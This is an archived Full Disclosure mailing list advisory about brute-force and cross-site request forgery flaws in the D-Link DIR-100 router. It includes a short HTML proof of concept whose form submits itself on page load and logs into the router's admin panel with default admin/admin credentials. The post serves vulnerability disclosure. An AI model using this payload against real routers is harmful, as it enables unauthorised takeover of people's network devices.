[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[FD] Vulnerabilities in D-Link DIR-100

Hello list!

There are Brute Force and Cross-Site Request Forgery vulnerabilities in D-Link DIR-100.

Affected products:

Vulnerable is the next model: D-Link DIR-100, Firmware v1.01. All other versions also must be vulnerable.


Brute Force (WASC-11):


No protection from BF attacks in login form.

Cross-Site Request Forgery (WASC-09):

Lack of protection against Brute Force (such as captcha) also leads to possibility of conducting of CSRF attacks, which I wrote about in the article Attacks on unprotected login forms (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2011-April/007773.html). It allows to conduct remote login. Which will be in handy at conducting of attacks on different CSRF and XSS vulnerabilities in control panel.

D-Link DIR-100 CSRF.html

<title>D-Link DIR-100 CSRF exploit (C) 2017 MustLive. http://websecurity.com.ua</title>
<body onLoad="document.hack.submit()">
<form name="hack" action="http://site/postlogin.xgi"; method="post">
<input type="hidden" name="authen_username" value="admin">
<input type="hidden" name="authen_password" value="admin">

Cross-Site Request Forgery (WASC-09):

Change admin's password:



2015.05.02 - announced at my site about vulnerabilities in DIR-100.
2015-2017 - informed developers about multiple vulnerabilities in this and other D-Link devices.
2017.02.04 - disclosed at my site (http://websecurity.com.ua/7745/).

Best wishes & regards,
Administrator of Websecurity web site

Sent through the Full Disclosure mailing list
Web Archives & RSS: http://seclists.org/fulldisclosure/